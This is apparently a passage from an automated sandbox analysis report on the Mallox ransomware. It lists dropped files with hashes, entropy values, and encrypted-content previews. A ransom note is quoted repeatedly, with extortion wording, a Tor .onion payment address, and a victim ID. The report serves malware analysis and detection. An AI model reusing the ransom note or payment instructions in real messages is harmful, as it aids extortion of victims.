                    SHA-512:8762B9B082DA3712A0CC9CC50622B9E7F681289E6AE9E50D3A25EE5C869763DF0ADDB732779E5E92ADB86432BAB98C034FD1FCB60AEF714B2BC5B7A134D3451C
                    Malicious:true
                    Preview:...s.q-...}.%.....N..P8.q........u7O....3.........L.s......,-.W.+..............R..v~uR.Qz..O.5.Y./.`.@.\0.,..{z.1<!..1.....ML.....;.1.^R...!......32..4.uz.}.sk(*.>...M..P....9UT...T..K....5.v..%VqUq.....#Y.....8...e!r...7`.Eq.K.... {.y.#..a..e..z.]....d...v.......@2x.,..v ......P...w..nz{......./...(.S1Me.WUi.q.L..$...B.o&.......u\..M3,F.u..,.E.}.i"?WG-0.T..4.$]..a.+. ..}.......91..e...MS...&...E...u."..g-@.G<.C..v.D..(4...!....=...]......a....3..y.#..V3`....._.....q...>o*..<..o.#..I..H.$..?{....*.8.....*...a.$U&m.|.....C....>..)......+...2.7..}`.6.[`.0..Gi..s.K..A..+h...&...~;z.....k8....,.j..)...Lr;..h.+.N..3..6..,.q....2...:....a.eQD).-W.......V.....|> x.z..J8.M..-PfC...X...5C.>.Gv...8O..%.....$'F'.u..~r.V...=...%Mc.h:l...~......x.b...;....L.1O..sn"&..j.......m......o.d..\.f{..`<..q.._.........~F2.4.....0..:;q.y.@s.E~.kZ.M..T^O.V.E....&.. ..V.Pa..M.,..?..7.u...r..\Q.z.;.f....o.uF.31.....G..I....W..2Z2.......+.W..gvq.....B

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips\2983\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips\2983\_metadata\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips\2983\safety_tips.pb

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):128557
                    Entropy (8bit):7.998485292792531
                    Encrypted:true
                    SSDEEP:3072:0mVFdAXnwQ+kLncXCC9RDwX+lz3JtXOv0nUzRj6d6GoCKR0D/Iwj:nLAXnPcCC91wXIvOv0wRxCKR0D/Hj
                    MD5:90DC165B5734A5D04F9AF848D05F8C6A
                    SHA1:B48418A8114AA2C0FED88D8954ED362677606FB1
                    SHA-256:5D513CB49204970EA2ECCAA07867BD816000EDD31473A32E6771A55F2CDDBB7C
                    SHA-512:3E0976ECB607C086A69CA41FE00F5EE29C222FD76A5DC40136FBB46A528BE3764A6F644A229D9F5D15F503E7B1433175036BE9ED3A80BF019B409609EF940597
                    Malicious:true
                    Preview:...<.O.J.A..........c.....w...Ahz...L,.j...F..k..>\./1....q.g..a..g.0.@h..!}.^..u.w>2.|E..*.H.....",..f.^}uM.t.p..TW......dW..}FX.W....^....AL.....S,.md....-..@...}9...5....BV.....LU....$.T. ..~...$L'.Fy..e....H[&.b0b....y....@s......d.2aF......I{.K..y....>3...B~vc...8.. tz.M.....l.O.....j........D.F.....Y.Q........i.d(.h.q.I..o")oE.~..l.....P]~D0....!p..ab.T....eTD......Z.J...C.....^A......O.#.HR._...........u...K...9.....!L...!.v].3.......||.I..-.!..[.&..V.F...@m..K.8..5..50.9.-.....8............]..P....A...`......G..V~W..5B..ACj.x.[ZH.#5...O...r...3.Ta....K........4..!.Z.}%/.ue1...I3-.. ..U.'SW.A-.z.].c.x.q........Y.Zr.dX.W...lN..{.}......Y.....P~=...,?...w.WME..f\...)..M.~:.....:.4......sv.a.c.hS..c..vr..J......s.n.doTp..S>.. ;5..l...U~.W..).A.7..Y..f(...bF.7Q...:>.h...|s.i`.1..o.<...n.......^....bkMdU..*w.).EO.R....q.xj.%%...)5..%.rq...>.n....P!m...O...>.a...{..uK.5ia.-......h........G.....r..x.0.i.(T.oP...".l.,T.....\....7

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270444
                    Entropy (8bit):7.999269611896296
                    Encrypted:true
                    SSDEEP:6144:zpqOm7ZqGNFh0AYdEp+etQ83EsAXqwA4PvsA:o/ZEmoey8rAftPvv
                    MD5:58E7EF1581917AFBAA716A8BA640A598
                    SHA1:EC5FB203D3B5637E7394C4DC53E8F6ED38ECEA4A
                    SHA-256:E868F56EF451EC5D94639A1FDA92183B86648E6B2A67A84A6D875D558752E65D
                    SHA-512:50DBA9009BA981DCA0553271894E551042E37F5E7F3CF5507E18C5B08813C90C893FD549C62CE7A6581199E908AC3BA2FFE381ADD6DFC8821057B2AEE508BD8A
                    Malicious:true
                    Preview:rs..z.9......Q...#..,A....8..e@......6.(.....c.g..VA1.9...Sb.Q ......V!.G...........A..J.4..F!a..d.fa...g../..J!et..loAO.p.ym,.....SQh.02....'..>.......Gj....}:..\...}Jra.<.S=C>.....T.i....?.M.a.n.......m...t.?6.B.....K..g%...=.,(b.....0(.J./7.A......L.V.<au....y.t%.x0...=+...$ue..^....R.3*.~/.......O....v...y....ETG.mwk.u.u..E..a.^ -FQ.......;fF...Z.XL...c... 3oX.....@.G.~.q.....'.e2..|..%.uJ..2s..G..M+zC.......2......y.l4l20G.p.Bq5..../....._..._.IT..<k....a...+...EEj.[...%7(W>.G.Z..!.|=.....T.....fy...#.?QG..0......r.U....d......3s 6.!.q..................a..#.K......,d...#..mL.%~...L:^.....4.K.@...R.ihw....6.Wc..p..*..k".Q.a.2.....p.....3.YI:..#e..l...E...i0...4.@./.....$...j:.Y.....,.....F...6..m2_.V.2..E?J.Y2...... .k^.h...+........E.P.t..Z...K.._..NP.%F..$...\..%."../3....Q.D*D..&z...v..=../..xo.!.....b...w..A<j.."..8......2.7....Q+.k../../:=..!.v)..~c..u.w...9....\"6>z...6......w......p....hc..B<......p#.).. ...l..)z..I6&

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\index

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):262620
                    Entropy (8bit):7.999349211784392
                    Encrypted:true
                    SSDEEP:6144:0KYstGPLmSH1RUtkxo1NFxsoBwVovsTaXSce+PJhc+Uoq2f0tG:rtILmSH1RUuoN7EaXve+PJa+Rq2f0tG
                    MD5:2BA4341857C81FD53B89585E4E0ABC01
                    SHA1:EB13DEE2B9D5DE834CF7C534B15EF654BE5C4BFE
                    SHA-256:5C94EFC5C3DDC5C2522BCF44C18BFA9D61218C63BC1BE453A1A11BF344642BDD
                    SHA-512:CE7D04785E4E895E94A3C4FA983CFC2C3C07968BA5B9E8D739E36741D7E4A94E61881810127752E87CA607AEDFF75A1E3D51C3B4A3C8C940042F1AEED72A09BE
                    Malicious:true
                    Preview:...".d...i..m.26....8.K.i..z.:...I.fO...t7.W..U.F.o..'...}.T.a..4.........{F...h..f...o..j...!Aj...Q&.j..W...1....V..,]...0...Z...Gr}u.B.X[`.c..i[x..... .xNp....Y.Hy..t6~.......+./-.....74..|U..BC.k.E3.Zt....../..7Jo..O.'....1G.r,..2........K..I.!.................<....7ji....A.+~...1...................Zy1...7*.\.......W1.}-..d@.....j\......*._..a....~\.K..A-5.2x1...G ."|g..,..0...g.E..@...~.....U.....u...v.....?1.`...j.".Fd...u.......d.U..Ht.tQM...0+.Iy..n.*..+....$.xm......F{.M#.........&3..../!..&.....V^.b..{|2!...F..U(....J.U.?[..o. ...b.....9..o&.\.D.8y.,'%m_..t..`....,dT2)X.#=.)...m....}....vP...P..k...W.......{.y...P\Q.DM................uP..l.AT.D.#+y.xS..B./....%f...).r...zw4.+.E{9.N........OF.;..#t,.*...[.1.)x.7.}...o..bh..+.X...l.....15`.....u....9.g..N!S.[{g.U.Y.z../..........{^...W.)..p...uRJwk...ZKq....y.o .s.{..j.G...tl..%F....V.....c...G..$..]nk-B\.D......?[8.[...E..Z..d).RWx..)Sg.r...O...Wx 3...,..BRc....r......}g../

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris_0

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):35410
                    Entropy (8bit):7.994858561124373
                    Encrypted:true
                    SSDEEP:768:XN/fQ1tfX2oXU6L73TKtP1pLvxYjtvKFIeRl4XmFoi:XN/fQ1tfGGU6L73OlUwAmqi
                    MD5:0975E237A27120FA20D10730BB4CCC6B
                    SHA1:C56180C85A004C6A14431092BA047ECA492567F1
                    SHA-256:A76205A81E244813B6AEA0D0F1DA4EB317A20ED1545EB458E24090885E331559
                    SHA-512:85EB6AE1DFC3A2E88AFCC9D8185B426C7DE79539029F01E04E381B782FFD0CE538A94B4FD9E5FD6AED58F8B9B1C2C3BDA171A11B4753D0316F186D56149EA3E0
                    Malicious:true
                    Preview:1...#+..e.".Q.-|....|.p.ZzK..;[.4..`.E.].....0..r...7....T{.Tk.7h.N..........H..I.}......=..-.w.HB..I.gi..Dc.N......M{...[...6...'.z....K.M.....sr..Q...!.i.......h...(6.....C...I.P.....\X.....A#.NwUJ.)...B. .#l...T(.=..E.."...r_..........."1,....a..^b9`.j...e....n.y..C~.....\T.G.k..."...L.)h...AfO.oS!...z.#4.U....3....!C.?..*r..z.K..^.#1<..q...B6..,Gygm.]....".H....HS.MO..K.p.$.....{ g.8Hj?.:....J..R..:.9..x=._.x..x..`..w.@.T...0..].0.f.|.M...j.^...Y.F.q.....U......Ao...=........c.krt......."...L.s.J.T..=.lbM....Jn:3D.3...CN.w..r...c...k.95..t...m.._....".Z.B..l.0.1....%.&..\{&.p{C.J..}....u....'.9I...k..bTp..W......@=.....X../-..6|yF|.K...Y..g.u...;'3...V......0..y..d.n.dnT...}.&...n.*5O...LG.\.....-.+@....K_......../......ob.;.!..w.f..S....|1x..f....H.G..bs.D~......".H.lTU.....aU..^5.S..w:}.Q.=...<].w.!xv!.5..g/.....n.=..4......RFx...G.Sv.z....V...5B.0J..J.k.5w!w:......9..%._...m.....9j7.....q..c...+v5.=.j. _XG]......UAQ.U..d=4)...O.|...:.^.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):35410
                    Entropy (8bit):7.993773687519665
                    Encrypted:true
                    SSDEEP:768:wVq9BHpMGZ0udmLYX/cY8043/AJlQe/12r8GtQWDrrGYmAl:wVKFDmLYvcY804oiqFIQmqNAl
                    MD5:D462E93B0E92A64A7BCBCAC67A38D091
                    SHA1:5FD53DF4D95FA450E1C52D4AD1CD1AB13503FF5B
                    SHA-256:6A743A2831B88F0C399D4E4A01B68A3FF3B7CC5393E24F6D3288441A111E9F12
                    SHA-512:9499EE2E347230FD75BE16E324B40028859A192E3571F7F7FBA8A7EB63FDAA6F6EB61F17CB16FB372A592417327A010AE3968B90988387C7FE030C1D35B72886
                    Malicious:true
                    Preview:...,=..A&..(s..'...Z.m.7..?....m.....BK.pN.......F.~...n!..8..%.................Jr.GJ....{.D......U..Me......;.vS.e..7......a..V....p.$`G~....fA@.,..Y.O.u.9C......Y+........X,.C....r$1..O<Z.a.....`.....\.!!Qh..'...7..".X....m.....W].~....a{,...S.....&...c[d.O......C2......G3...$.;..B..(........X..k.\.W...m.m.l...?W{..W.^.t...y...$B..c4^.....@.l&6$*. ....G.....GE...Y..).o...v..C...d%..z...4G^.?c4`...d.{..]PMd5..q....+....W.@.0..i.l..._.k....V....[..:Tu.....9...;...b..<\2H....,".....@P2...O......w.8.\.x6.+k`...T....h....uq.xOP.. ^.D.L....0{$F;..bV+...4...........~.A:....9w..M.[...`....D.......R._E.x#.m5.....1.W....a.6.!...;....GO..}T...!....n.n......$.....n,.&83...4.$..l!._.@.q}k....,7n.E.(...J.2..}v..:JC..IBC@..V(.n.3....O.[.k"...JQ.....R......../.M_....../*......<.8+.Q.=..o....J:f.`t..N.t.p.y...{&..U..$......qa.Y?&]...t.%....F..Z.F..2..N......p...9...N..'kt. ...$...A.1....p..:..7....XkK%R.c...ev.=%...l.>....'./L.t%-S....I..C...

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Speech Recognition\1.15.0.1\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Speech Recognition\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
